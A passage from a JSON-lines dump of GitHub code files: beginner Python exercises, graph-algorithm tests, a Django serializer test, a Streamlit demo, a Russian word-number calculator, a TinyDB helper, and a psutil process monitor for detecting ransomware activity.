\"):\n num = False\n while (num == False):\n try:\n num = int(input(message))\n except ValueError:\n print(\"That was not a number, \", end=\"\")\n return num\n\nnum1 = readNum()\nnum2 = readNum(\"enter second number: \")\n\nanswer = num1 * num2\nprint(f\"answer is 
{answer}\")\n","repo_name":"fabiofabrizi/Programming-and-Scripting","sub_path":"labs/week06-Functions/readInNumbers.py","file_name":"readInNumbers.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"71892182929","text":"\"\"\"Testing for ch06\"\"\"\n\nimport logging\nimport random\nimport unittest\nfrom heapq import heapify, heappop, heappush\nfrom itertools import count\n\nLOG = logging.getLogger(__name__)\n\n####################################################\ndef huffman_trees(seq, frq):\n \"\"\"huffman encoding, seq, frq are lists\"\"\"\n num = count()\n trees = list(zip(frq, num, seq))\n heapify(trees)\n LOG.info(\"trees: {0}\".format(trees))\n while len(trees) > 1:\n fa, _, a = heappop(trees)\n fb, _, b = heappop(trees)\n n = next(num)\n heappush(trees, (fa + fb, n, [a, b]))\n return trees[0][-1]\n\ndef huffman_codes(tree, prefix=\"\"):\n \"\"\"tree is a list of list representing trees\"\"\"\n if len(tree) == 1:\n yield (tree, prefix)\n return\n for bit, child in zip(\"01\", tree):\n for pair in huffman_codes(child, prefix + bit):\n yield pair\n\ndef huffman_decode(binary, current_tree, root_tree):\n \"\"\"TODO: \"\"\"\n pass\n\n####################################################\n\"\"\"Naive implementation of Kruskall algorithm\"\"\"\ndef naive_find(C, u):\n while C[u] != u: # search the representative\n u = C[u]\n return u\n\ndef naive_union(C, u, v):\n u = naive_find(C, u)\n v = naive_find(C, v) # make v as the representative\n C[u] = v\n\ndef naive_kruskal(G):\n E = [(G[u][v], u, v) for u in G for v in G[u]]\n T = set()\n C = {u:u for u in G}\n for _, u, v in sorted(E):\n if naive_find(C, u) != naive_find(C, v):\n T.add(u, v)\n naive_union(C, u, v)\n return T\n####################################################\n\"\"\"Improved Kruskall algorithm\nthe running time is Theta(mlgn):\n\"\"\"\ndef find(C, u):\n if C[u] != u:\n C[u] = find(C, C[u]) # path compression, a little bit mind bending\n return C[u]\n\ndef union(C, R, u, v):\n u = find(C, u)\n v = find(C, v)\n if R[u] > R[v]: # union by rank\n C[v] = u\n else:\n C[u] = v\n if R[u] == R[v]:\n R[v] += 1\n\ndef kruska(G):\n E = [(G[u][v], u, v) for u in G for v in G[u]]\n T = set()\n C, R = {u:u for u in G}, {u:0 for u in G}\n for _, u, v in sorted(E):\n if find(C, u) != find(C, v):\n T.add(u, v)\n union(C, R, u, v)\n return T\n\n#######################################################\n\"\"\"Prim's algorithm\"\"\"\ndef prim(G, s):\n \"\"\"here to do list is a priority queue based on weight\"\"\"\n P, Q = {}, [(0, None, s)] # here 0 is the waight, None here is the predecessor of s\n while Q:\n _, p, u = heappop(Q)\n if u in P:\n continue\n P[u] = p\n for v, w in G[u].items():\n heappush(Q, (w, u, v)) # hereu is predecessor of v\n return P\n\n\n\n\n\n\nclass Ch07TestSuite(unittest.TestCase):\n \"\"\"Basic test cases.\"\"\"\n\n def test_make_changes(self):\n \"\"\"greedy thinking\"\"\"\n denom = [10000, 5000, 2000, 1000, 500, 200, 100, 50, 25, 10, 5, 1]\n owed = 5632\n payed = []\n result = [5000, 500, 100, 25, 5, 1, 1]\n for d in denom:\n while owed >= d:\n owed -= d\n payed.append(d)\n self.assertEqual(sum(payed), 5632)\n self.assertEqual(payed, result)\n\n def test_huffman_trees(self):\n seq = \"abcdefghi\"\n frq = [4, 5, 6, 9, 11, 12, 15, 16, 20]\n result_trees = [['i', [['a', 'b'], 'e']], [['f', 'g'], [['c', 'd'], 'h']]]\n self.assertEqual(huffman_trees(seq, frq), result_trees)\n result_char_map = 
dict(huffman_codes(result_trees))\n self.assertEqual(result_char_map['a'], '0100')\n self.assertEqual(result_char_map['b'], '0101')\n\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"chengzh2008/pyAlgo","sub_path":"tests/test_ch07.py","file_name":"test_ch07.py","file_ext":"py","file_size_in_byte":3661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"18527764046","text":"from unittest import TestCase\n\nfrom django.contrib.auth.models import User\nfrom django.db.models import Count, Case, When, Avg\n\nfrom store.models import Book, UserBookRelation\nfrom store.serializers import BookSerializer\n\n\nclass BookSerializerTestCase(TestCase):\n\n def test_serializer_ok(self):\n self.user1 = User.objects.create(username=\"test_username1\", first_name='hikki', last_name='hikigaya')\n self.user2 = User.objects.create(username=\"test_username2\", first_name='adilet', last_name='aidaraliev')\n self.user3 = User.objects.create(username='test_username3', first_name='adi', last_name='adiko')\n\n book1 = Book.objects.create(name='test book 1', price=10, author_name='Author 1')\n book2 = Book.objects.create(name='test book 2', price=20, author_name='Author 2')\n\n UserBookRelation.objects.create(user=self.user1, book=book1, rate=5)\n UserBookRelation.objects.create(user=self.user2, book=book1, rate=5)\n UserBookRelation.objects.create(user=self.user3, book=book1, rate=1)\n\n UserBookRelation.objects.create(user=self.user1, book=book2, rate=5)\n UserBookRelation.objects.create(user=self.user2, book=book2, rate=1)\n UserBookRelation.objects.create(user=self.user3, book=book2, )\n\n books = Book.objects.annotate(\n annotated_likes=Count(Case(When(userbookrelation__like=True, then=1))),\n rating=Avg('userbookrelation__rate')).order_by('id')\n\n data = BookSerializer(books, many=True).data\n\n expected_data = [\n {\n 'id': book1.id,\n 'name': 'test book 1',\n 'price': '10.00',\n 'author_name': 'Author 1',\n 'annotated_likes': 3,\n 'rating': '3.67',\n 'owner_name': 'user1',\n 'readers': [\n\n {\n \"first_name\": \"hikki\",\n \"last_name\": \"hikigaya\"\n }\n ]\n\n },\n {\n 'id': book2.id,\n 'name': 'test book 2',\n 'price': '20.00',\n 'author_name': 'Author 2',\n 'annotated_likes': 2,\n 'rating': '3.00',\n 'owner_name': '2',\n 'readers': [\n {\n \"first_name\": \"adilet\",\n \"last_name\": \"aidaraliev\"\n }\n ]\n }\n ]\n print(data)\n self.assertEqual(expected_data, data)\n","repo_name":"Hikki02/books_store","sub_path":"app/store/tests/test_serializers.py","file_name":"test_serializers.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"17388301493","text":"import httplib\r\n\r\nclass HttplibStrategy(object):\r\n def __init__(self, config, environment):\r\n self.config = config\r\n self.environment = environment\r\n\r\n def http_do(self, http_verb, path, headers, request_body):\r\n if self.environment.is_ssl:\r\n conn = httplib.HTTPSConnection(self.environment.server, self.environment.port)\r\n else:\r\n conn = httplib.HTTPConnection(self.environment.server, self.environment.port)\r\n\r\n conn.request(http_verb, path, request_body, headers)\r\n response = conn.getresponse()\r\n status = response.status\r\n response_body = response.read()\r\n conn.close()\r\n return [status, 
response_body]\r\n","repo_name":"quantm/custom_django_oscar","sub_path":"lib/braintree/util/http_strategy/httplib_strategy.py","file_name":"httplib_strategy.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"35382179545","text":"LOG_FILE = 'log.log'\n\nLOGGER = {\n \"version\": 1,\n \"disable_existing_loggers\": False,\n \"root\": {\n \"level\": \"DEBUG\",\n \"handlers\": [\n \"console\",\n \"file\",\n ],\n },\n \"formatters\": {\n \"default\": {\n \"class\": \"logging.Formatter\",\n \"format\": \"%(asctime)s %(name)s %(levelname)s %(message)s\",\n },\n \"json\": {\n \"class\": \"pythonjsonlogger.jsonlogger.JsonFormatter\",\n \"format\": \"%(asctime)s %(name)s %(levelname)s %(message)s\",\n },\n },\n \"handlers\": {\n \"console\": {\n \"class\": \"logging.StreamHandler\",\n \"formatter\": \"default\",\n \"level\": \"DEBUG\",\n },\n \"file\": {\n \"class\": \"logging.FileHandler\",\n \"level\": \"INFO\",\n \"filename\": LOG_FILE,\n \"mode\": \"a\",\n \"formatter\": \"json\",\n },\n },\n \"loggers\": {\n \"kafka\": {\n \"handlers\": [\"console\"],\n \"level\": \"INFO\",\n \"propagate\": False,\n },\n },\n}","repo_name":"IrinaNizova/graduate_work","sub_path":"config/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"14216990547","text":"import streamlit as st\nfrom datetime import time, datetime\n\nst.header(\"st.slider\")\n\n# Example 1. Creating a slider with different values.\n# The parameters given are the start, the end, and the default value.\n\nst.subheader(\"Slider\")\n\nage = st.slider(\"How old are you?\", 0, 130, 25)\nst.write(\"I'm\", age, \"years old\")\n\n# Example 2. st.slider() can be used to define a range\n\nst.subheader(\"Range slider\")\n\nvalues = st.slider(\"Select a range of values\",\n 0.0, 100.0, (25.0, 75.0))\nst.write(\"Values:\", values)\n\n# Example 3. The values used by a slider can also be datetime formats, not just numerical values\n\nst.subheader(\"Range time slider\")\n\nappointment = st.slider(\"Schedule your appointment:\",\n value = (time(11, 30), time(12, 45)))\nst.write(\"You're scheduled for:\", appointment)\n\n# Example 4. 
Here the slider takes the default value, and sets\n# default range to the value (in this case 14 days ahead and before)\n\nst.subheader(\"Datetime slider\")\n\nstart_time = st.slider(\"When do you start?\",\n value = datetime(2020, 1, 1, 9, 30),\n format = \"DD/MM/YY - hh:mm\")\nst.write(\"Start time:\", start_time)","repo_name":"marmeladof/30DaysOfStreamlit","sub_path":"day8_streamlit_app.py","file_name":"day8_streamlit_app.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"36520278304","text":"# НАЧАЛО ИМПОРТА БИБЛИОТЕК\r\nimport re\r\nfrom num2words import num2words\r\nfrom googletrans import Translator\r\nfrom word2number.w2n import word_to_num\r\nfrom word2number import w2n\r\n\r\n# КОНЕЦ ИМПОРТА БИБЛИОТЕК\r\n\r\n# НАЧАЛО РАБОТЫ СО СЛОВАРЯМИ\r\n\r\noperation_dict = ['плюс', 'минус', 'умножить', 'разделить на', 'поделить на', 'умножить на'] # СЛОВАРЬ ОПЕРАЦИЙ\r\n\r\nadot_dict = {'десятых': 0.1, 'сотых': 0.01, 'тысячных': 0.001, 'десятитысячных': 0.0001, # СЛОВАРЬ РАЗРЯДОВ\r\n 'стотысячных': 0.00001, 'миллионных': 0.000001,\r\n 'десятая': 0.1, 'сотая': 0.01, 'тысячная': 0.001, 'десятитысячная': 0.0001,\r\n 'стотысячная': 0.00001, 'миллионная': 0.000001\r\n }\r\n\r\nadot_usual = {1: 'десятых', 2: 'сотых', 3: 'тысячных', 4: 'десятитысячных', 5: 'стотысячных', 6: 'миллионных'}\r\n # СЛОВАРЬ РАЗРЯДОВ ДЛЯ ЧИСЕЛ С ТОЧКОЙ\r\n\r\n# КОНЕЦ РАБОТЫ СО СЛОВАРЯМИ\r\n\r\n\"\"\"\r\n Функция перевода входного числа из словестного формата в числовой\r\n Происходит путем перевода из русского языка в английский, и использования сторонней библиотеки word2number\r\n \r\n\"\"\"\r\ndef translate_to_letter(word):\r\n error = True\r\n while error:\r\n try: # Пытаемся сделать))\r\n translator = Translator() # Инициализируем гугл переводчик\r\n second_rank = None # Будем здесь хранить стрепень десятичной дроби\r\n for string in adot_dict: # Тут мы ищем эту степень во входной строки\r\n match2 = re.search(string, word)\r\n if match2:\r\n second_rank = string\r\n main_letter_adot = ' '\r\n\r\n match = re.search(r' и ', word) # Проверяем на наличие десятичной части\r\n if match:\r\n full_str = word.split(' и ') # Делим текст на лист из слов\r\n before_dot = translator.translate(full_str[0], src='ru', dest='en').text # Переводим текст части до запятой на английский\r\n before_dot = w2n.word_to_num(before_dot) # с помощью сторонней библиотеки word2number переводим наш текст в числа\r\n\r\n after_dot = full_str[1] # Собираем часть после запятой\r\n\r\n if after_dot[-1] == ' ':\r\n after_dot = after_dot[:-1]\r\n\r\n after_dot = after_dot.split(' ') # превращаем текст после запятой в лист из слов\r\n rank = after_dot[-1] # Находим степень\r\n del after_dot[-1] # Удаляем степень\r\n\r\n main_letter_adot = ' '.join(after_dot)\r\n\r\n main_letter_adot = main_letter_adot.replace(\"одна\", \"один\") # ЗАМЕНА ОДИН НА ОДНА\r\n\r\n main_letter_adot = translator.translate(main_letter_adot, src='ru', dest='en').text # Переводим в английский\r\n main_letter_adot = w2n.word_to_num(main_letter_adot) # Переводим в число\r\n\r\n\r\n rank = adot_dict[rank] # Превращаем степень из слова в число\r\n\r\n\r\n word = before_dot + main_letter_adot*rank # Соединяем целую и дробную часть\r\n\r\n elif(second_rank != None): # Зайдем если есть только дробная часть (баш ватылды)\r\n\r\n if word[-1] == ' ':\r\n word = word[:-1]\r\n\r\n word = word.split(' ') # Делим текст на лист из слов\r\n rank = word[-1] # Находим степень\r\n del word[-1] # 
Удаляем степень\r\n\r\n\r\n main_letter_adot = ' '.join(word) # Содираем для перевода\r\n\r\n main_letter_adot = main_letter_adot.replace(\"одна\", \"один\") # ЗАМЕНА ОДНА НА ОДИН\r\n\r\n\r\n main_letter_adot = translator.translate(main_letter_adot, src='ru', dest='en').text # Переводим в английский\r\n main_letter_adot = w2n.word_to_num(main_letter_adot) # Переводим в число\r\n\r\n rank = adot_dict[rank] # Превращаем степень из слова в число\r\n\r\n\r\n word = main_letter_adot * rank # Записывем дробную часть\r\n else: # Зайдем если дробной части нет, что и есть хорошо\r\n\r\n word = translator.translate(word, src='ru', dest='en').text # Переводим в английский\r\n word = w2n.word_to_num(word) # Переводим в число\r\n error = False\r\n return word\r\n except ValueError: # Если какие-то ошибки сообщаем об этом\r\n return -1\r\n except AttributeError:\r\n error = True\r\n except KeyError:\r\n return -1\r\n\r\n# КОНЕЦ ФУНКЦИИ ПЕРЕВОДА\r\n\r\n# НАЧАЛО ФУНКЦИИ ДЕЛЕНИЯ\r\n\"\"\"\r\n Функция деления с нахоженим десятичной дроби и периода.\r\n После нахожедения челой части путем обычного деления, для нахождения нецелой части программа меняет делимое\r\n на остаток от деления, домнажает на десять. Также с помощью словоря отслеживается текущие делители, чтобы они\r\n не повторялись. Если все же повторяются, то переводит их в период\r\n\r\n\"\"\"\r\ndef division(numerator, denominator):\r\n # Делимое и делитель умножаются на 10.000.000 что бы они были целыми, т. к. алгоритм работает только с целыми числами\r\n numerator = int(numerator * 10000000)\r\n denominator = int(denominator * 10000000)\r\n if (numerator % denominator == 0): # Проверка на делимость нацело\r\n ans = str(numerator // denominator) # Делим, возвращаем, красота!!!\r\n return ans\r\n else:\r\n ans = str(numerator // denominator) + \".\" # Нахождение целой части\r\n l = {} # Словарь текущих делителей\r\n index = 0 # Переменная для отслеживания когда встречается текущее делимое\r\n numerator = numerator % denominator # Для нахождения дробной части делимое становиться остатком от деления\r\n l[numerator] = index\r\n flag = False\r\n while flag == False: # Проверка на зацикливания текущего делимого после запятой, т. е. 
периодичность\r\n if numerator == 0: # Если текущий делитель равен нулю, то мы получаем в ответе окончалеьное частное, выходим из цикла\r\n break\r\n digit = numerator * 10 // denominator # Находим текущую цифру после запятой\r\n numerator = numerator * 10 - (numerator * 10 // denominator) * denominator # Находим текущее делимое\r\n if numerator not in l: # Если текущее делимое еще не встречалось, то записываем его в словарь, с ключом index\r\n ans += str(digit)\r\n index += 1\r\n l[numerator] = index\r\n else: # Иначе мы получаем цикл делителей, значит получаем периодичность\r\n ans += str(digit) + \")\"\r\n ans = ans[:l.get(numerator) + len(ans[:ans.index(\".\") + 1])] + \"(\" + ans[l.get(numerator) + len(\r\n ans[:ans.index(\".\") + 1]):] # Зная начало периода с ключом index, можем записать в ans частное\r\n flag = True\r\n return ans\r\n\r\n\r\n# КОНЕЦ ФУНКЦИИ ДЕЛЕНИЯ\r\n\r\ndef calc(main_str): # ФУНКЦИЯ КАЛЬКУЛЯТОР, ЕСЛИ ВОЗВРАЩАЕТСЯ \"-1\" - следовательно что-то сделано неверно!\r\n pattern = re.compile(r'[а-яёА-ЯЁ]+')\r\n goon = re.match(pattern, main_str)\r\n if not goon: # ПРОВЕРКА НА РУССКИЕ СИМВОЛЫ\r\n return -1\r\n if not main_str: # ПРОВЕРКА НА ПУСТОЕ ЗНАЧЕНИЕ\r\n return -1\r\n current_operation = 'error'\r\n for string in operation_dict: # ПОИСК ОПЕРАЦИИ В СТРОКЕ\r\n match = re.search(string, main_str)\r\n if match:\r\n current_operation = string # ОПЕРАЦИЯ\r\n if current_operation == 'error':\r\n return -1\r\n try:\r\n tokens = main_str.split(' ' + current_operation + ' ') # ДЕЛИМ ЧИСЛО УДАЛЯЯ ОПЕРАЦИЮ\r\n first_num, second_num = tokens[:-1], tokens[-1:]\r\n first_num, second_num = first_num[0], second_num[0]\r\n except IndexError: # ПРОВЕРКА НА ПРАВИЛЬНОСТЬ ВВЕДЕНИЕ\r\n return -1\r\n\r\n\r\n first_num = translate_to_letter(first_num) # ПЕРЕВОД ДВУХ ЧИСЕЛ ИЗ ТЕКСТА В ЧИСЛА\r\n second_num = translate_to_letter(second_num)\r\n\r\n if (first_num == -1) or (second_num == -1): # ПРОВЕРКА НА ОШИБКУ (К ФУНКЦИЯМ ПЕРЕВОДА)\r\n return -1\r\n\r\n if current_operation == \"плюс\": # ОПЕРАЦИЯ СЛОЖЕНИЯ\r\n ans = first_num + second_num\r\n elif current_operation == \"умножить\" or current_operation == \"умножить на\": # ОПЕРАЦИЯ УМНОЖЕНИЯ\r\n ans = first_num * second_num\r\n elif current_operation == \"минус\": # ОПЕРАЦИЯ ВЫЧИТАНИЯ\r\n ans = first_num - second_num\r\n elif current_operation == \"разделить на\" or current_operation == \"поделить на\": # ОПЕРАЦИЯ ДЕЛЕНИЯ,\r\n ans = division(first_num, second_num) # ВЫПОЛНЯЕМАЯ ОТДЕЛЬНОЙ ФУНКЦИЕЙ\r\n # division\r\n\r\n if isinstance(ans, str) == False:\r\n ans = round(ans, 6)\r\n ans = str(ans)\r\n\r\n match = re.search('\\.', ans) # ПРОВЕРКА НА НАЛИЧИЕ ТОЧКИ (ДЕСЯТИЧНОГО ЧИСЛА)\r\n if match:\r\n ans = ans.split('.') # РАЗДЕЛЕНИЕ ЧИСЛА НА \"ДО ТОЧКИ\" и \"ПОСЛЕ ТОЧКи\"\r\n before_dot = num2words(ans[0], lang='ru') # ПЕРЕВОД ЧИСЛА ДО ТОЧКИ\r\n after_dot = ans[1] # ЧИСЛО ПОСЛЕ ТОЧКИ\r\n\r\n match = re.search(r'\\(', after_dot) # ПРОВЕРКА ЧИСЛА НА НАЛИЧИЕ ПЕРИОДА\r\n if match:\r\n after_dot_parts = re.split(r'\\(', after_dot) # ДЕЛИМ СТРОКУ НА ПЕРИОД И ТО, ЧТО ДО ПЕРИОДА, НО ПОСЛЕ ТОЧКИ\r\n after_dot_parts[1] = after_dot_parts[1][:-1]\r\n if len(after_dot_parts[0]) + len(after_dot_parts[1]) > 6: # ОГРАНИЧЕНИЕ НА ДЛИНУ ПЕРИОДА (6)\r\n after_dot = (after_dot_parts[0] + after_dot_parts[1])[:6]\r\n else:\r\n num_of_zeroes_in_period = 0\r\n for i in after_dot_parts[1]:\r\n if i == '0':\r\n num_of_zeroes_in_period += 1 # СЧЕТЧИК НУЛЕЙ В ПЕРИОДЕ ДО ОСНОВНОГО ЧИСЛА\r\n else:\r\n break\r\n after_dot_parts[1] = 
num2words(after_dot_parts[1][num_of_zeroes_in_period:], lang='ru') # ПЕРЕВОД ЧИСЛА\r\n\r\n ans = before_dot\r\n\r\n if len(after_dot_parts[0]) != 0: # ПРОВЕРКА ЕСТЬ ЛИ ВООБЩЕ ЧТО-ТО ДО ПЕРИОДА\r\n rank_10 = adot_usual[len(after_dot_parts[0])] # ДЛИНА ЧИСЛА ПОСЛЕ ТОЧКИ, НЕЯВЛЯЮЩИМСЯ ПЕРИОДОМ\r\n for i in after_dot_parts[0]:\r\n if i == '0': # УКОРАЧИВАНИЕ ЧИСЛА ПО ПОСЛЕДНИМ НУЛЯМ\r\n after_dot_parts[0] = after_dot_parts[0][1:]\r\n else:\r\n break\r\n after_dot_parts[0] = num2words(int(after_dot_parts[0]), lang='ru') #\r\n ans += ' и ' + after_dot_parts[0] + ' ' + rank_10\r\n\r\n ans += ' и ' + \"ноль \" * num_of_zeroes_in_period + after_dot_parts[1] + \" в периоде\"\r\n match = re.search(r'\\(', after_dot)\r\n if not match: # ЕСЛИ НЕТ ПЕРИОДА В ЧИСЛЕ\r\n rank_10 = adot_usual[len(after_dot)] # ДЛИНА ЧИСЛА ПОСЛЕ ТОЧКИ, НЕЯВЛЯЮЩИМСЯ ПЕРИОДО\r\n for i in after_dot:\r\n if i == '0': # УКОРАЧИВАНИЕ ЧИСЛА ПО ПОСЛЕДНИМ НУЛЯМ\r\n after_dot = after_dot[1:]\r\n else:\r\n break\r\n if after_dot == '':\r\n ans = before_dot\r\n else:\r\n after_dot = num2words(int(after_dot), lang='ru')\r\n ans = before_dot + ' и ' + after_dot + ' ' + rank_10 # ФОРМИРОВАНИЕ ГОТОВОГО ОТВЕТА В СТРОКУ\r\n\r\n\r\n else: # ЕСЛИ ОБЫЧНОЕ ЧИСЛО\r\n ans = num2words(ans, lang='ru') # ПЕРЕВОД ЧИСЛА ОБРАТНО В ТЕКСТ\r\n\r\n return ans # ВОЗВРАЩЕНИЕ ФУНКЦИЕЙ calc() ответа\r\n\r\n\"\"\"\r\n Основная функция\r\n Считаем строку, пытаемся выполнить в ней описанною операцию. Если введено некорректно, выполняем заново,\r\n пока не сможем выполнить \r\n \r\n\"\"\"\r\n\r\nif __name__ == \"__main__\":\r\n flag = True\r\n while flag: # ЦИКЛ ДЛЯ ПРОВЕРКИ КОРРЕКТНОСТИ ВВЕДЕНЫХ ЗНАЧЕНИЙ\r\n line_main = input('Введите выражение: ') # СЧИТЫВАНИЕ СТРОКИ В ВИДЕ: \"ЧИСЛО ОПЕРАЦИЯ ЧИСЛО\"\r\n line_main = line_main.lower() # ЗАНИЖЕНИЕ СТРОКИ В НИЖНИЙ РЕГИСТР\r\n\r\n ans = calc(line_main) # ВЫЗОВ ФУНКЦИИ ОСНОВНОГО КАЛЬКУЛЯТОРА\r\n if ans != -1: # ПРОВЕРКА НА ОШИБКУ | ОШИБКА = -1, ИНАЧЕ - ОШИБОК НЕТ\r\n print('Ответ: ', ans)\r\n flag = False # ВЫВОД СТРОКИ И ЗАВЕРШЕНИЕ ПРОГРАММЫ\r\n else:\r\n flag = True\r\n print('Вы ввели неверное выражение, введите, пожалуйста, заново.') # СООБЩЕНИЕ ОБ ОШИБКЕ","repo_name":"bombermon/text_calcalator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":16305,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"11500139191","text":"from tinydb import TinyDB, Query\nfrom tinydb.operations import delete\n\nimport dbUser\n\ndbFileName = 'db.json'\n\nuserTable = TinyDB(dbFileName).table('users')\nstatTable = TinyDB(dbFileName).table('stat')\nUser = Query()\n\ndef reassign_db():\n global userTable\n global statTable\n global User\n\n userTable = TinyDB(dbFileName).table('users')\n statTable = TinyDB(dbFileName).table('stat')\n User = Query()\n\ndef has_user(teleId):\n global userTable\n return userTable.contains(User.teleId == teleId)\n\ndef store_user(user):\n global userTable\n userTable.remove(User.teleId == user.teleId)\n userTable.insert(user.toDict())\n\ndef get_users():\n global userTable\n return [dbUser.dbUser.parse(x) for x in userTable.all()]\n\ndef get_user(teleId):\n global userTable\n return dbUser.dbUser.parse(userTable.search(User.teleId == teleId)[0])","repo_name":"Coestaris/ReplyItBot","sub_path":"src/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"68"} +{"seq_id":"36469652503","text":"def merge_sort(lista):\n 
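# split the list in half, sort each half recursively, then merge; e.g. merge_sort([5, 2, 8]) -> [2, 5, 8]\n    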
list_length = len(lista)\n\n    if list_length <= 1:\n        return lista\n\n    mid_point = list_length // 2\n\n    left_partition = merge_sort(lista[:mid_point])\n    right_partition = merge_sort(lista[mid_point:])\n\n    return merge(left_partition, right_partition)\n\n\ndef merge(left, right):\n    output = []\n    i = j = 0\n\n    while i < len(left) and j < len(right):\n\n        if left[i] < right[j]:\n            output.append(left[i])\n            i += 1\n        else:\n            output.append(right[j])\n            j += 1\n\n    output.extend(left[i:])\n    output.extend(right[j:])\n\n    return output\n","repo_name":"KowalskiIT/minor-projects","sub_path":"all_sort_of_sorts/merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"18185302925","text":"import psutil\r\nimport time\r\nimport threading\r\nimport json\r\n\r\nfrom config import Config\r\nfrom detect_ransomware import DetectRansomware\r\n\r\n\r\ndef get_current_running_process():\r\n    running_process = []\r\n    for proc in psutil.process_iter(['pid', 'name']):\r\n        try:\r\n            # Get process info as named tuple (pid, name)\r\n            proc_info = proc.as_dict(attrs=['pid', 'name'])\r\n            running_process.append((proc_info['pid'], proc_info['name']))\r\n        except (psutil.NoSuchProcess, psutil.AccessDenied, psutil.ZombieProcess):\r\n            pass\r\n    return running_process\r\n\r\n\r\nlock = threading.Lock()\r\n\r\n\r\nclass ProcessesToMonitor:\r\n    global lock\r\n\r\n    def __init__(self):\r\n        self.processes = dict()\r\n\r\n    def add_item(self, pid, process_name):\r\n        with lock:\r\n            self.processes[pid] = process_name\r\n\r\n    def remove_item(self, pid):\r\n        with lock:\r\n            self.processes[pid] = None\r\n\r\n    def get_processes_to_monitor(self):\r\n        with lock:\r\n            return self.processes\r\n\r\n\r\nprocesses_to_monitor = ProcessesToMonitor()\r\n\r\n\r\ndef monitor_process():\r\n    print('[+] Monitoring Process')\r\n    global processes_to_monitor\r\n    previous_processes = get_current_running_process()\r\n\r\n    while True:\r\n        try:\r\n            current_processes = get_current_running_process()\r\n\r\n            # Find the new and exited processes\r\n            new_processes = [p for p in current_processes if p not in previous_processes]\r\n            exited_processes = [p for p in previous_processes if p not in current_processes]\r\n\r\n            # Print the new and exited processes\r\n            for pid, name in new_processes:\r\n                print(\"New process started: PID={} Name={}\".format(pid, name))\r\n                processes_to_monitor.add_item(pid, name)\r\n\r\n            for pid, name in exited_processes:\r\n                print(\"Process exited: PID={} Name={}\".format(pid, name))\r\n                processes_to_monitor.remove_item(pid)\r\n\r\n            # Update the previous list of processes and wait for 1 second before updating again\r\n            previous_processes = current_processes\r\n            time.sleep(1)\r\n        except KeyboardInterrupt:\r\n            exit(0)\r\n        except (OSError, Exception) as _:\r\n            print('[!] 
Exception in Monitoring Process')\r\n\r\n\r\ndef monitor_resource_activity():\r\n global processes_to_monitor\r\n ransomware_detection = DetectRansomware()\r\n results = dict()\r\n cur_count = 21\r\n while True:\r\n if cur_count > 999999: # To prevent integer overflow\r\n cur_count = 1\r\n if (cur_count % Config.DUMP_INTERVAL) == 0:\r\n if ransomware_detection.resource_activity_detection(results):\r\n ransomware_detection.take_action_on_ransomware_detection()\r\n with open('resource_activity', 'w') as f:\r\n json.dump(results, f)\r\n cur_count += 1\r\n try:\r\n processes = processes_to_monitor.get_processes_to_monitor()\r\n for pid, name in processes.items():\r\n if name is None:\r\n continue\r\n try:\r\n process_obj = psutil.Process(pid)\r\n except (psutil.NoSuchProcess, Exception):\r\n continue\r\n process_key = str(pid) + ':' + name\r\n if not results.get(process_key, False):\r\n results[process_key] = dict({\r\n 'cpu_percent': [process_obj.cpu_percent()],\r\n 'ram': [process_obj.memory_info().rss],\r\n 'read_count': [process_obj.io_counters().read_count],\r\n 'write_count': [process_obj.io_counters().write_count],\r\n 'read_bytes': [process_obj.io_counters().read_bytes],\r\n 'write_bytes': [process_obj.io_counters().write_bytes]\r\n })\r\n else:\r\n results[process_key]['cpu_percent'].append(process_obj.cpu_percent())\r\n results[process_key]['ram'].append(process_obj.memory_info().rss)\r\n results[process_key]['read_count'].append(process_obj.io_counters().read_count)\r\n results[process_key]['write_count'].append(process_obj.io_counters().write_count)\r\n results[process_key]['read_bytes'].append(process_obj.io_counters().read_bytes)\r\n results[process_key]['write_bytes'].append(process_obj.io_counters().write_bytes)\r\n time.sleep(1)\r\n except KeyboardInterrupt:\r\n exit(0)\r\n except Exception as ex:\r\n print('[!] Exception in monitoring resource activity')\r\n print(ex)\r\n\r\n\r\ndef monitor_network_activity():\r\n ransomware_detection = DetectRansomware()\r\n global processes_to_monitor\r\n results = dict()\r\n cur_count = 1\r\n while True:\r\n if cur_count > 999999: # To prevent integer overflow\r\n cur_count = 1\r\n if (cur_count % Config.DUMP_INTERVAL) == 0:\r\n if ransomware_detection.network_based_activity_detection(results):\r\n ransomware_detection.take_action_on_ransomware_detection()\r\n with open('network_activity', 'w') as f:\r\n json.dump(results, f)\r\n cur_count += 1\r\n try:\r\n processes = processes_to_monitor.get_processes_to_monitor()\r\n for pid, name in processes.items():\r\n if name is None:\r\n continue\r\n try:\r\n process_obj = psutil.Process(pid)\r\n except (psutil.NoSuchProcess, Exception):\r\n continue\r\n connections = process_obj.connections()\r\n for conn in connections:\r\n process_key = str(pid) + ':' + name\r\n network_activity = dict({\r\n 'family': str(conn.family), \r\n 'type': str(conn.type),\r\n 'laddr': str(conn.laddr),\r\n 'raddr': str(conn.raddr),\r\n 'status': conn.status\r\n })\r\n if not results.get(process_key, False):\r\n results[process_key] = [network_activity]\r\n else:\r\n results[process_key].append(network_activity)\r\n time.sleep(10)\r\n except KeyboardInterrupt:\r\n exit(0)\r\n except Exception as ex:\r\n print('[!] 
